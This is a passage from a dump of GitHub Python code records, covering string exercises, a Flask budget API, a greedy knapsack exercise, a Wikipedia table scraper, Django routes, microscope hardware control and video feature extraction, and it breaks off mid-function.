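    return [c for c in (cand1, cand2) if c is not None and nums.count(c) > len(nums) // 3]

print(majority_element_n3([3, 2, 3]))                 # [3]
print(majority_element_n3([1, 1, 1, 3, 3, 2, 2, 2]))  # [1, 2]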
{"seq_id":"6669703575","text":"# 02. 「パトカー」+「タクシー」=「パタトクカシーー」\n# Concatenate the characters of 「パトカー」 and 「タクシー」 alternately, starting from the first character of each, to obtain the string 「パタトクカシーー」.\n#\na = 'パトカー'\nb = 'タクシー'\na_len = len(a)\nb_len = len(b)\nab = []\n\nfor count in range(a_len):\n    a_str = a[count]\n    b_str = b[count]\n    ab.append(a_str)\n    ab.append(b_str)\n\nab =\"\".join(ab)\nprint (ab)\n","repo_name":"nagamine-404/nlp100","sub_path":"002.py","file_name":"002.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
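The index loop above interleaves two equal-length strings one character at a time; the same result falls out of zip in a single expression, since zip pairs characters positionally:

a = 'パトカー'
b = 'タクシー'
print(''.join(x + y for x, y in zip(a, b)))  # パタトクカシーー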
{"seq_id":"28132524934","text":"import time\r\nimport os\r\nfrom hashlib import md5\r\nfrom datetime import datetime\r\nfrom flask import Flask, request, session, url_for, redirect, render_template, abort, g, flash, _app_ctx_stack\r\nfrom flask_restful import Resource, Api\r\nfrom werkzeug import check_password_hash, generate_password_hash\t \r\nfrom flask_restful import reqparse, abort, Api, Resource\r\n\r\n\r\n# create our little application :)\r\napp = Flask(__name__)\r\napi = Api(app)\r\n\r\napp.config.update(dict(SEND_FILE_MAX_AGE_DEFAULT=0))\r\n\r\nCATEGORIES = {\t }\r\nPURCHASE = {}\r\n#the next step is to change the todo into the user_ids, so that later only the user who created the room can delete it\r\n#need to somehow send the user's id via json to the js file\r\n\r\nSECRET_KEY = 'development key'\r\n\r\n\r\napp.config.from_object(__name__)\r\napp.config.from_envvar('MINITWIT_SETTINGS', silent=True)\r\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\r\n\r\n#db.init_app(app)\r\n\r\n\r\ndef abort_if_cat_doesnt_exist(cat_id):\r\n\tif cat_id not in CATEGORIES:\r\n\t\tabort(404, message=\"category {} doesn't exist\".format(cat_id))\r\n\r\ndef abort_if_pur_doesnt_exist(pur_id):\r\n\tif pur_id not in PURCHASE:\r\n\t\tabort(404, message=\"purchase {} doesn't exist\".format(pur_id))\r\n\t\t\r\n\t\t\r\nparser = reqparse.RequestParser()\r\nparser.add_argument('task')\r\n\r\n\r\n\r\nclass categories(Resource):\r\n\tdef get(self, cat_id):\t\t\t\t\t#defining one controller for each RESTful operation\r\n\t\tabort_if_cat_doesnt_exist(cat_id)\r\n\t\treturn CATEGORIES[cat_id]\r\n\r\n\tdef delete(self, cat_id):\r\n\t\tabort_if_cat_doesnt_exist(cat_id)\r\n\t\tdel CATEGORIES[cat_id]\r\n\t\treturn '', 204\r\n\r\n\tdef put(self, cat_id):\t\t\t\t\t\t#why is there a chatroomid here and the method still works \r\n\t\targs = parser.parse_args()\r\n\t\ttask = {'task': args['task']}\r\n\t\tCATEGORIES[cat_id] = task\r\n\t\treturn task, 201\r\n\r\n\r\n\r\nclass category_list(Resource):\r\n\tdef get(self):\r\n\t\treturn CATEGORIES\r\n\r\n\t#need to think more about the null case, when the chatroom is null\t\r\n\tdef post(self):\r\n\t\targs = parser.parse_args()\r\n\t\tif CATEGORIES:\r\n\t\t\tcat_id = str(len(CATEGORIES))\t\t\t# keep ids as strings so URL path lookups match\r\n\t\t\t#cat_id = int(max(CATEGORIES.keys()).lstrip('category')) + 1\t\t\t#honestly, the id here is changeable, doesn't really need to have the same name, think about how\r\n\t\t\t#cat_id = 'category%i' % cat_id\r\n\t\telse:\r\n\t\t\tcat_id = '0'#'category1' \t\t\t\t\t\t\t\t\t\t\t\t#for the empty array situation\t\t\t\r\n\t\t\r\n\t\tCATEGORIES[cat_id] = {'task': args['task']}\t\t\t\t#here is the place where you input the new messages, or just set message class as a list of strings?\r\n\t\treturn CATEGORIES[cat_id], 201\t\t#can specify the status code, like created, removed and ok\r\n\t\t\r\n###############################\t\t\r\nclass purchases(Resource):\r\n\tdef get(self, pur_id):\t\t\t\t\t#defining one controller for each RESTful operation\r\n\t\tabort_if_pur_doesnt_exist(pur_id)\r\n\t\treturn PURCHASE[pur_id]\r\n\r\n\tdef delete(self, pur_id):\r\n\t\tprint(\"pur_id is \",pur_id);\r\n\t\tabort_if_pur_doesnt_exist(pur_id)\r\n\t\tdel PURCHASE[pur_id]\r\n\t\treturn '', 204\r\n\r\n\tdef put(self, pur_id):\t\t\t\t\t\t#why is there a chatroomid here and the method still works \r\n\t\targs = parser.parse_args()\r\n\t\ttask = {'task': args['task']}\r\n\t\tPURCHASE[pur_id] = task\r\n\t\treturn task, 201\r\n\r\n\r\n\r\nclass purchase_list(Resource):\r\n\tdef get(self):\r\n\t\treturn PURCHASE\r\n\r\n\t#need to think more about the null case, when the chatroom is null\t\r\n\tdef post(self):\r\n\t\targs = parser.parse_args()\t\t\t\t#just change the int into len or something\r\n\t\t\r\n\t\tif PURCHASE:\r\n\t\t\tpur_id = str(len(PURCHASE))\t# keep ids as strings so URL path lookups match\t#pur_id=int(max(PURCHASE.keys()).lstrip('purchase')) + 1\t\t\t#honestly, the id here is changeable, doesn't really need to have the same name, think about how\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tpur_id = '0'\r\n\t\t\t\r\n\t\tPURCHASE[pur_id] = {'task': args['task']}\t\t\t\t#here is the place where you input the new messages, or just set message class as a list of strings?\r\n\t\treturn PURCHASE[pur_id], 201\t\t#can specify the status code, like created, removed and ok\r\n\t\t\r\n\r\n\r\n\r\n#might want to consider getting rid of the get_id methods, kind of useless here \t\r\n\r\n\r\n\r\ndef gravatar_url(email, size=80):\r\n\t\"\"\"Return the gravatar image for the given email address.\"\"\"\r\n\treturn 'http://www.gravatar.com/avatar/%s?d=identicon&s=%d' % \\\r\n\t\t(md5(email.strip().lower().encode('utf-8')).hexdigest(), size)\r\n\t\t\r\n\r\n@app.route('/')\r\ndef userInterface():\t\r\n\treturn render_template('userInterface.html' )\r\n\t\r\n\r\n\t\r\n\t\r\napp.jinja_env.filters['gravatar'] = gravatar_url\r\napi.add_resource(category_list, '/cats')\r\napi.add_resource(categories, '/cats/<cat_id>')\r\n\r\napi.add_resource(purchase_list, '/purchases')\r\napi.add_resource(purchases, '/purchases/<pur_id>')\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\tapp.run(debug=True)\r\n","repo_name":"SimonSaid1996/budget-app","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
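A quick way to exercise the endpoints above from a client; a hedged sketch using the third-party requests package, assuming the app is running locally on Flask's default port 5000, with an illustrative task value.

import requests

BASE = "http://127.0.0.1:5000"

# create one category, then read the whole collection back
created = requests.post(BASE + "/cats", data={"task": "groceries"}).json()
print(created)                        # {'task': 'groceries'}
print(requests.get(BASE + "/cats").json())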
{"seq_id":"16446680644","text":"from typing import List\n\n\nclass Item(object):\n\n    def __init__(self, n, v, w) -> None:\n        self.name = n\n        self.value = v\n        self.weight = w\n\n    def getValue(self):\n        return self.value\n\n    def getWeight(self):\n        return self.weight\n\n    def density(self):\n        return self.getValue()/self.getWeight()\n\n    def __str__(self):\n        return f\"{self.name} : < {self.value}, {self.weight} >\"\n\n\ndef buildCollection(names, values, weight):\n    menu = []\n    for i in range(len(values)):\n        menu.append(Item(names[i], values[i], weight[i]))\n\n    return menu\n\n\ndef greedy(items, max_weight, key_function):\n    \"\"\"Implementation of a flexible greedy algorithm\n    (independent of the definition of best)\"\"\"\n    # sort the items from best to worst according to the key_function (our definition of best)\n    items_copy: List[Item] = sorted(items, key=key_function, reverse=True)\n    result = []\n    total_value, total_weight = 0, 0\n    # add items to the result until max_weight is reached\n    for i in range(len(items_copy)):\n        if (total_weight + items_copy[i].getWeight()) <= max_weight:\n            result.append(items_copy[i])\n            total_weight += items_copy[i].getWeight()\n            total_value += items_copy[i].getValue()\n\n    return (result, total_value)\n\n\ndef testGreedy(items, constraint, key_function):\n    taken, val = greedy(items, constraint, key_function)\n    print(f\"Total value of items taken = {val}\")\n    for item in taken:\n        print(item)\n\n\ndef testGreedys(foods, max_units):\n    print(\"Use greedy by value to allocate\", max_units, 'Kg')\n    testGreedy(foods, max_units, Item.getValue)\n    print(\"\\nUse greedy by weight to allocate\", max_units, 'Kg')\n    testGreedy(foods, max_units, lambda x: 1/Item.getWeight(x))\n    print(\"\\nUse greedy by density to allocate\", max_units, 'Kg')\n    testGreedy(foods, max_units, Item.density)\n\nif __name__ == \"__main__\":\n    names = ['clock', 'picture', 'radio', 'vase',\n             'book', 'computer']\n    values = [175, 90, 20, 50, 10, 200]\n    weight = [10, 9, 4, 2, 1, 20]\n    foods = buildCollection(names, values, weight)\n    testGreedys(foods, 20)\n","repo_name":"kesler20/ossu","sub_path":"computer_science/introduction/MITx 6.00.2x/exercise_2.py","file_name":"exercise_2.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"22951802826","text":"import csv\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen('https://en.wikipedia.org/wiki/Comparison_of_text_editors')\nbsObj = BeautifulSoup(html,'html.parser')\ntable = bsObj.find_all('table',{'class':'wikitable'})[0]\nrows = table.find_all('tr')\n\ncsvFile = open('./editors.csv','wt',newline='',encoding='utf-8')\ntry:\n\twriter = csv.writer(csvFile)\n\tfor row in rows: # outer loop reads each table row\n\t\tcsvRow = []\n\t\tfor cell in row.find_all(['td','th']): # inner loop reads every cell in the row\n\t\t\tcsvRow.append(cell.get_text())\n\t\twriter.writerow((csvRow))\nfinally:\n\tcsvFile.close()\n\t\n\t\n","repo_name":"StarStudyStart/WebSpiderSpace","sub_path":"Network_data/03CSVTest.py","file_name":"03CSVTest.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} {"seq_id":"43400698539","text":"from django.urls import path\nfrom . 
import views\nfrom django.conf import settings\n\nurlpatterns = [\n path('invite', views.invite),\n path('place-ships', views.placeShips),\n path('shoot', views.shoot),\n path('notify', views.notify),\n path('game-over', views.gameOver)\n]","repo_name":"khacduy221997/battle-ships","sub_path":"api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38476831165","text":"import time\r\nimport os\r\nimport configparser\r\nfrom threading import Thread\r\nfrom Devices.AnalogDigitalOut import AnalogDigital_output_MCC, Digital_output, Analog_output\r\nfrom Devices.AnalogIn import AnalogInput\r\nfrom MNetwork.Connections import ClientObject\r\nimport ctypes\r\n\r\nimport numpy as np\r\n\r\ndef getNumberOfChannels(channel='Dev1/ai0:2'):\r\n if 'ai' in channel : chType = 'ai'\r\n else : chType = 'ao'\r\n try :\r\n upper = int(channel[channel.find(\":\") + 1:])\r\n lower = int(channel[channel.find(chType)+2:channel.find(\":\")])\r\n number_of_channels = upper - lower + 1\r\n except :\r\n number_of_channels = 1\r\n return number_of_channels\r\n\r\nclass NetworkDevice(object):\r\n def __init__(self, parent = None, deviceName = \"thorlabsdds220\", parentName = \"microscoper\",\r\n varName=\"networkDevice\", verbose=False):\r\n \"\"\"\r\n Creates a networked device.\r\n :param deviceName: Should be the same as deviceName in the server.ini file.\r\n :param parentName: Should be the same as the deviceName in the server.ini file.\r\n :param varName: Should be the same as the variable declared in the parent python file.\r\n \"\"\"\r\n\r\n self.parent = parent\r\n if not hasattr(self.parent,\"connection\"):\r\n raise Exception('parent must have connection attribute of class ClientObject')\r\n self.deviceName = deviceName\r\n self.parentName = parentName\r\n self.varName = varName\r\n self.verbose = verbose\r\n\r\n def sendCommand(self,command=\"moveAbs(25,1)\"):\r\n '''A command template'''\r\n self.parent.connection.sendConnectionMessage(f\"{self.deviceName}.{command}\")\r\n\r\n\r\n def sendQuery(self,query=\"currentPosition\",targetVar=\"delayStagePosition\"):\r\n '''A query template'''\r\n self.parent.connection.askForResponse(receiver=self.deviceName,\r\n sender=self.parentName,\r\n question=f\"{query}\",\r\n target=f\"{self.varName}.{targetVar}\",\r\n wait=True,\r\n verbose=self.verbose\r\n )\r\n\r\n ## if varName is device, this returns self.parent.device.delayStagePosition\r\n return getattr(eval(\"self.parent.{}\".format(self.varName)), targetVar)\r\n\r\n def getPos(self):\r\n return self.sendQuery()\r\n\r\n def move(self,absPosition = None, moveVel = None):\r\n self.sendCommand(\"moveAbs({},{})\".format(absPosition,moveVel))\r\n\r\n def moveToStartPosition(self):\r\n self.sendCommand(\"moveToStartPosition()\")\r\n\r\n def initScan(self, arg=\"continuous\"):\r\n self.sendCommand(f\"initScan(\\\"{arg}\\\")\")\r\n\r\n def startScan(self):\r\n self.sendCommand(\"startScan()\")\r\n\r\n def status(self):\r\n \"\"\" Returns True if the stage is not moving else False\r\n \"\"\"\r\n return not self.sendQuery(\"isMoving\",\"isMoving\")\r\n\r\n def stop(self):\r\n self.sendCommand(\"stop()\")\r\n\r\n\r\nclass MicroscopeDetector(object):\r\n def __init__(self, widgets=None, model=\"3101\"):\r\n ''' widget = array of PyQT widgets\r\n define slider widgets first before preset widgets'''\r\n self.PMT = AnalogDigital_output_MCC(boardNumber=0,model=model,name=\"PMT\")\r\n self.TPEF = 0\r\n 
self.SHG = 1\r\n self.CARS = 2\r\n self.Tr = 3\r\n\r\n # Define actions array\r\n self.setPMTsInitActions = []\r\n self.setPMTsSliderActions = []\r\n self.setPMTsZeroActions = []\r\n self.setPMTsPresetActions = []\r\n\r\n # Define widgets array\r\n self.labelWidgets = []\r\n self.sliderWidgets = []\r\n\r\n if widgets is not None: self.__setWidgets(widgets)\r\n\r\n self.setPMTsZero()\r\n\r\n def test(self):\r\n self.PMT.set_voltage(1,self.TPEF)\r\n self.PMT.set_voltage(1, self.SHG)\r\n self.PMT.set_voltage(1.0, self.CARS)\r\n\r\n def setPMTs(self):\r\n for action in self.setPMTsInitActions:\r\n action()\r\n print('Setting PMTs to voltage.')\r\n self.statusWidget.setText('PMT Status : On')\r\n\r\n def setPMTsZero(self):\r\n for action in self.setPMTsZeroActions:\r\n action(slider=False)\r\n # exec(action)\r\n self.statusWidget.setText('PMT Status : Off')\r\n\r\n def stop(self):\r\n self.PMT.set_voltage(0,self.TPEF)\r\n self.PMT.set_voltage(0, self.SHG)\r\n self.PMT.set_voltage(0, self.CARS)\r\n self.PMT.set_voltage(0, self.Tr)\r\n\r\n def __defValuePresetFunction(self,n,widget):\r\n value = widget.text()\r\n # value = eval(\"self.PresetWidget%s.text()\" % n)\r\n if 'zero' in value.lower(): value = 0\r\n value = int(value)\r\n def valuePresetFunction(execute=True,slider=True):\r\n if slider:\r\n try : self.sliderWidgets[n].setValue(value)\r\n except : print('No slider widget defined. Define slider widget first if available.')\r\n try : self.labelWidgets[n].setText(\"%i\"%(value))\r\n except : print('No text indicator widget defined. Define text widget first if available.')\r\n voltage = value/1000.\r\n if execute :\r\n self.PMT.set_voltage(voltage, int(n))\r\n return valuePresetFunction\r\n\r\n def __defSetPMTFunction(self,n,widget):\r\n def setPMTFunction(execute=False):\r\n value = widget.value()\r\n voltage = value/1000.\r\n self.labelWidgets[n].setText('%i'%(value))\r\n if execute :\r\n self.PMT.set_voltage(voltage, n)\r\n return setPMTFunction\r\n\r\n def __defInitPMTFunction(self,n,widget):\r\n def initPMTFunction(execute=True):\r\n value = widget.value()\r\n voltage = value/1000.\r\n if execute :\r\n self.PMT.set_voltage(voltage, n)\r\n return initPMTFunction\r\n\r\n\r\n def __hasNumbers(self,inputString):\r\n return any(char.isdigit() for char in inputString)\r\n\r\n def __getNumber(self,inputString):\r\n for char in inputString:\r\n if char.isdigit():\r\n return int(char)\r\n\r\n def __setWidgets(self,widgets):\r\n for widget in widgets:\r\n widgetName = widget.objectName().lower()\r\n if 'slider' in widgetName :\r\n if self.__hasNumbers(widgetName) :\r\n n = self.__getNumber(widgetName)\r\n self.sliderWidgets.append(widget)\r\n self.setPMTsSliderActions.append(self.__defSetPMTFunction(n,widget))\r\n self.setPMTsInitActions.append(self.__defInitPMTFunction(n,widget))\r\n if 'label' in widgetName :\r\n if self.__hasNumbers(widgetName) :\r\n n = self.__getNumber(widgetName)\r\n self.labelWidgets.append(widget)\r\n if 'zero' in widgetName :\r\n if self.__hasNumbers(widgetName) :\r\n n = self.__getNumber(widgetName)\r\n self.setPMTsZeroActions.append(self.__defValuePresetFunction(n,widget))\r\n if 'preset' in widgetName:\r\n if self.__hasNumbers(widgetName):\r\n n = self.__getNumber(widgetName)\r\n self.setPMTsPresetActions.append(self.__defValuePresetFunction(n,widget))\r\n if 'status' in widgetName:\r\n self.statusWidget = widget\r\n print('%s Stage widget connected.'%widget.objectName())\r\n\r\nclass MicroscopeShutter(object):\r\n def __makeFunctionChangeName(self,widget):\r\n 
originalText = widget.text()\r\n def newFunction(value=True):\r\n if value == True :\r\n widget.setText(originalText + ' is open')\r\n else :\r\n widget.setText(originalText + ' closed')\r\n return newFunction\r\n\r\n def __setWidgets(self,widgets):\r\n for widget in widgets:\r\n widgetName = widget.objectName().lower()\r\n if 'pump' in widgetName :\r\n self.pumpChangeText = self.__makeFunctionChangeName(widget)\r\n if self.Pump_shutter.get_digital_in() == 0:\r\n widget.setText(widget.text() + ' is open')\r\n self.pump = True\r\n else :\r\n widget.setText(widget.text() + ' closed')\r\n self.pump = False\r\n if 'stokes' in widgetName :\r\n # widget.setText(widget.text() + ' closed')\r\n # self.stokes = False\r\n self.stokesChangeText = self.__makeFunctionChangeName(widget)\r\n if self.Stokes_shutter.get_digital_in() == 0:\r\n widget.setText(widget.text() + ' is open')\r\n self.stokes = True\r\n else :\r\n widget.setText(widget.text() + ' closed')\r\n self.stokes = False\r\n\r\n def __init__(self,widgets=None):\r\n self.Stokes_shutter = AnalogDigital_output_MCC(model=\"3101\",name='Stokes shutter')\r\n self.Pump_shutter = AnalogDigital_output_MCC(model=\"3101\",name='Pump shutter')\r\n self.Microscope_shutter = Digital_output(\"Dev1/port0/line7\")\r\n self.Microscope_shutter_close()\r\n self.Pump_shutter_close()\r\n self.Stokes_shutter_close()\r\n\r\n if widgets is not None :\r\n self.__setWidgets(widgets)\r\n\r\n\r\n def Pump_shutter_close(self):\r\n print('Pump shutter close')\r\n self.Pump_shutter.set_digital_out(value=1,port=1)\r\n\r\n def Pump_shutter_open(self):\r\n print('Pump shutter open')\r\n self.Pump_shutter.set_digital_out(value=0,port=1)\r\n\r\n def Stokes_shutter_close(self):\r\n print('Stokes shutter close')\r\n self.Stokes_shutter.set_digital_out(1,port=2)\r\n\r\n def Stokes_shutter_open(self):\r\n print('Stokes shutter open')\r\n self.Stokes_shutter.set_digital_out(0,port=2)\r\n\r\n def Microscope_shutter_close(self):\r\n self.Microscope_shutter.write(np.array([255],dtype=np.uint8))\r\n # self.Microscope_shutter.close()\r\n\r\n def Microscope_shutter_open(self):\r\n self.Microscope_shutter.write(np.array([0],dtype=np.uint8))\r\n # self.Microscope_shutter.close()\r\n\r\n def Set_PumpShutter(self):\r\n self.pump = not self.pump\r\n if self.pump :\r\n self.Pump_shutter_open()\r\n else :\r\n self.Pump_shutter_close()\r\n try :\r\n self.pumpChangeText(self.pump)\r\n except :\r\n pass\r\n\r\n\r\n def Set_StokesShutter(self):\r\n self.stokes = not self.stokes\r\n if self.stokes :\r\n self.Stokes_shutter_open()\r\n else :\r\n self.Stokes_shutter_close()\r\n try :\r\n self.stokesChangeText(self.stokes)\r\n except :\r\n pass\r\n\r\n\r\nclass Microscope(object):\r\n mainPath = os.path.dirname(os.path.realpath(__file__))\r\n ini_file = mainPath + '/Microscoper_app.ini'\r\n acquiring = False\r\n settings = None\r\n extensionApps = None\r\n devices = None\r\n\r\n def __init__(self):\r\n self.defineDefaultSettings()\r\n\r\n def __checkExists(self):\r\n if os.name == \"nt\":\r\n handle = ctypes.windll.user32.FindWindowW(None, \"Microscoper 2017\") # Checks if the app is already running\r\n if handle != 0:\r\n ctypes.windll.user32.ShowWindow(handle, 10) # If the app exists, move window to top\r\n exit(0) # Close the python program\r\n\r\n def maximizeWindows(self):\r\n handles = []\r\n if os.name == \"nt\":\r\n for appWindowName in self.extensionApps:\r\n handle = ctypes.windll.user32.FindWindowW(None, appWindowName)\r\n ctypes.windll.user32.ShowWindow(handle, 10)\r\n\r\n def 
defineDefaultSettings(self):\r\n self.settings = {\r\n \"filename\": \"Microscoper\",\r\n \"directory\": \"C:/Users/Jeremy/Desktop/Microscoper\",\r\n \"device buffer\": \"8192\",\r\n \"max scan amplitude\": \"16\",\r\n \"input channels\": \"Dev1/ai0:3\",\r\n \"output channels\": \"Dev1/ao0:1\",\r\n \"resolution\": \"32\",\r\n \"zoom\": \"1\",\r\n \"dwell time\": \"1\",\r\n \"fill fraction\": \"1\",\r\n \"delay start position\": \"0\",\r\n \"delay end position\": \"10\",\r\n \"delay increments\": \"0.050\",\r\n \"focus start position\": \"0\",\r\n \"focus end position\": \"20\",\r\n \"focus increments\": \"0.48\",\r\n \"delay preset1\": \"0\",\r\n \"delay preset2\": \"80\",\r\n \"delay preset3\": \"150\",\r\n \"stage x target\": \"0\",\r\n \"stage y target\": \"0\",\r\n \"stage z target\": \"0\",\r\n \"stage x current\": \"0\",\r\n \"stage y current\": \"0\",\r\n \"stage z current\": \"0\",\r\n \"frames to average\": \"1\",\r\n \"connection port\": \"10230\",\r\n \"scan x offset\": \"0\",\r\n \"scan y offset\": \"0\",\r\n }\r\n\r\n for i in range(0, getNumberOfChannels(self.settings[\"input channels\"])):\r\n self.settings[\"PMT %i\" % i] = \"0\"\r\n self.settings[\"Image Maximums %i\" % i] = \"1000\"\r\n self.settings[\"Image Minimums %i\" % i] = \"0\"\r\n\r\n self.deviceList = {\r\n \"linearstage\" : \"odl220\",\r\n }\r\n\r\n def loadConfig(self):\r\n\r\n config = configparser.ConfigParser()\r\n\r\n def make_default_ini():\r\n self.defineDefaultSettings()\r\n config[\"Settings\"] = {}\r\n for key, value in self.settings.items():\r\n config['Settings'][str(key)] = str(value)\r\n config[\"Devices\"] = {}\r\n for key, value in self.deviceList.items():\r\n config[\"Devices\"][str(key)] = str(value)\r\n\r\n with open(self.ini_file, 'w') as configfile:\r\n config.write(configfile)\r\n\r\n def read_ini():\r\n self.defineDefaultSettings()\r\n config.read(self.ini_file)\r\n configSettings = list(config.items(\"Settings\"))\r\n\r\n for key, value in configSettings:\r\n self.settings[key] = value\r\n\r\n self.imageMaximums = []\r\n self.imageMinimums = []\r\n for i in range(0,getNumberOfChannels(self.settings[\"input channels\"])):\r\n max = float(config['Settings']['Image Maximums %i' % i])\r\n min = float(config['Settings']['Image Minimums %i' % i])\r\n if max == min:\r\n max += 1\r\n self.imageMaximums.append(max)\r\n self.imageMinimums.append(min)\r\n\r\n devices = list(config.items(\"Devices\"))\r\n\r\n for key, value in devices:\r\n self.deviceList[key] = value\r\n\r\n try:\r\n read_ini()\r\n except:\r\n make_default_ini()\r\n read_ini()\r\n\r\n\r\n def saveConfig(self):\r\n config = configparser.ConfigParser()\r\n config[\"Settings\"] = {}\r\n config[\"Extension apps\"] = {}\r\n config[\"Devices\"] = {}\r\n for key, value in self.settings.items():\r\n config['Settings'][str(key)] = str(value)\r\n for key, value in self.deviceList.items():\r\n config['Devices'][str(key)] = str(value)\r\n with open(self.ini_file, 'w') as configfile:\r\n config.write(configfile)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n import time\r\n s = MicroscopeShutter()\r\n # s.Pump_shutter_open()\r\n s.Stokes_shutter_open()\r\n time.sleep(1)\r\n # s.Pump_shutter_close()\r\n s.Stokes_shutter_close()\r\n # s.Microscope_shutter_close()\r\n # 
s.Stokes_shutter_open()","repo_name":"JeremyPorquez/MicroscoperPython","sub_path":"microscoper/MicroscoperComponents.py","file_name":"MicroscoperComponents.py","file_ext":"py","file_size_in_byte":15735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"792056180","text":"import argparse, os\nimport h5py\nfrom scipy.misc import imresize\nimport skvideo.io\nfrom PIL import Image\nimport json\n\nimport torch\nfrom torch import nn\nimport torchvision\nimport random\nimport numpy as np\n\nfrom models import resnext\nfrom tqdm import tqdm\n\n\ndef load_file_paths(args):\n ''' Load a list of (path,image_id tuples).'''\n file_paths = list()\n with open(args.annotation_file, 'r', encoding='utf-8') as anno_file:\n instances = json.load(anno_file)\n video_ids = [instance['video_id'] for instance in instances['videos']]\n video_ids = set(video_ids)\n for vid in video_ids:\n if args.feature_type in ['appearance', 'motion']:\n file_paths.append((args.dataset_dir + 'video/{}.avi'.format(vid), vid))\n elif args.feature_type == 'hand':\n file_paths.append((args.dataset_dir + 'hand/{}hand.avi'.format(vid), vid))\n else:\n file_paths.append((args.dataset_dir + 'audio/{}.wav'.format(vid), vid))\n\n return file_paths\n\ndef build_resnet():\n if not hasattr(torchvision.models, args.model):\n raise ValueError('Invalid model \"%s\"' % args.model)\n if not 'resnet' in args.model:\n raise ValueError('Feature extraction only supports ResNets')\n cnn = getattr(torchvision.models, args.model)(pretrained=True)\n model = torch.nn.Sequential(*list(cnn.children())[:-1])\n model.cuda()\n model.eval()\n return model\n\n\ndef build_resnext():\n model = resnext.resnet101(num_classes=400, shortcut_type='B', cardinality=32,\n sample_size=112, sample_duration=16,\n last_fc=False)\n model = model.cuda()\n model = nn.DataParallel(model, device_ids=None)\n assert os.path.exists('preprocess/pretrained/resnext-101-kinetics.pth')\n model_data = torch.load('preprocess/pretrained/resnext-101-kinetics.pth', map_location='cpu')\n model.load_state_dict(model_data['state_dict'])\n model.eval()\n return model\n\n\ndef run_batch(cur_batch, model):\n \"\"\"\n Args:\n cur_batch: treat a video as a batch of images\n model: ResNet model for feature extraction\n Returns:\n ResNet extracted feature.\n \"\"\"\n mean = np.array([0.485, 0.456, 0.406]).reshape(1, 3, 1, 1)\n std = np.array([0.229, 0.224, 0.224]).reshape(1, 3, 1, 1)\n\n image_batch = np.concatenate(cur_batch, 0).astype(np.float32)\n image_batch = (image_batch / 255.0 - mean) / std\n image_batch = torch.FloatTensor(image_batch).cuda()\n with torch.no_grad():\n image_batch = torch.autograd.Variable(image_batch)\n\n feats = model(image_batch)\n feats = feats.data.cpu().clone().numpy()\n\n return feats\n\n\ndef extract_clips_with_consecutive_frames(path, num_clips, num_frames_per_clip):\n \"\"\"\n Args:\n path: path of a video\n num_clips: expected numbers of splitted clips\n num_frames_per_clip: number of frames in a single clip, pretrained model only supports 16 frames\n Returns:\n A list of raw features of clips.\n \"\"\"\n valid = True\n clips = list()\n try:\n video_data = skvideo.io.vread(path)\n except:\n print('file {} error'.format(path))\n valid = False\n if args.model == 'resnext101':\n return list(np.zeros(shape=(num_clips, 3, num_frames_per_clip, 112, 112))), valid\n else:\n return list(np.zeros(shape=(num_clips, num_frames_per_clip, 3, 224, 224))), valid\n total_frames = video_data.shape[0]\n img_size = 
(args.image_height, args.image_width)\n for i in np.linspace(0, total_frames, num_clips + 2, dtype=np.int32)[1:num_clips + 1]:\n clip_start = int(i) - int(num_frames_per_clip / 2)\n clip_end = int(i) + int(num_frames_per_clip / 2)\n if clip_start < 0:\n clip_start = 0\n if clip_end > total_frames:\n clip_end = total_frames - 1\n clip = video_data[clip_start:clip_end]\n if clip_start == 0:\n shortage = num_frames_per_clip - (clip_end - clip_start)\n added_frames = []\n for _ in range(shortage):\n added_frames.append(np.expand_dims(video_data[clip_start], axis=0))\n if len(added_frames) > 0:\n added_frames = np.concatenate(added_frames, axis=0)\n clip = np.concatenate((added_frames, clip), axis=0)\n if clip_end == (total_frames - 1):\n shortage = num_frames_per_clip - (clip_end - clip_start)\n added_frames = []\n for _ in range(shortage):\n added_frames.append(np.expand_dims(video_data[clip_end], axis=0))\n if len(added_frames) > 0:\n added_frames = np.concatenate(added_frames, axis=0)\n clip = np.concatenate((clip, added_frames), axis=0)\n new_clip = []\n for j in range(num_frames_per_clip):\n frame_data = clip[j]\n img = Image.fromarray(frame_data)\n img = imresize(img, img_size, interp='bicubic')\n img = img.transpose(2, 0, 1)[None]\n frame_data = np.array(img)\n new_clip.append(frame_data)\n new_clip = np.asarray(new_clip) # (num_frames, channels, width, height)\n if args.model in ['resnext101']:\n new_clip = np.squeeze(new_clip)\n new_clip = np.transpose(new_clip, axes=(1, 0, 2, 3))\n clips.append(new_clip)\n return clips, valid\n\n\ndef extract_feature(model, files_path, num_clips, outfile):\n \"\"\"\n Args:\n model: loaded pretrained model for feature extraction\n files_path: list of files path\n num_clips: expected numbers of splitted clips\n outfile: path of output file to be written\n Returns:\n h5 file containing visual features of splitted clips.\n \"\"\"\n if not os.path.exists('data/{}'.format(args.dataset)):\n os.makedirs('data/{}'.format(args.dataset))\n\n dataset_size = len(files_path)\n\n with h5py.File(outfile, 'w') as fd:\n feat_dset = None\n file_ids_dset = None\n i0 = 0\n for i, (file_path, file_id) in enumerate(tqdm(files_path)):\n if args.feature_type == 'audio':\n try:\n feat = model.forward(file_path)\n except:\n feat = torch.zeros(8, 128)\n if feat_dset is None:\n (C, D) = (8, 128)\n feat_dset = fd.create_dataset('VGG_features', (dataset_size, C, D),\n dtype=np.float32)\n file_ids_dset = fd.create_dataset('ids', shape=(dataset_size,), dtype=int)\n\n i1 = i0 + 1\n if feat.size(0) != C:\n if len(feat.shape) == 1:\n feat = torch.unsqueeze(feat, dim=0)\n sample_list = np.linspace(0, 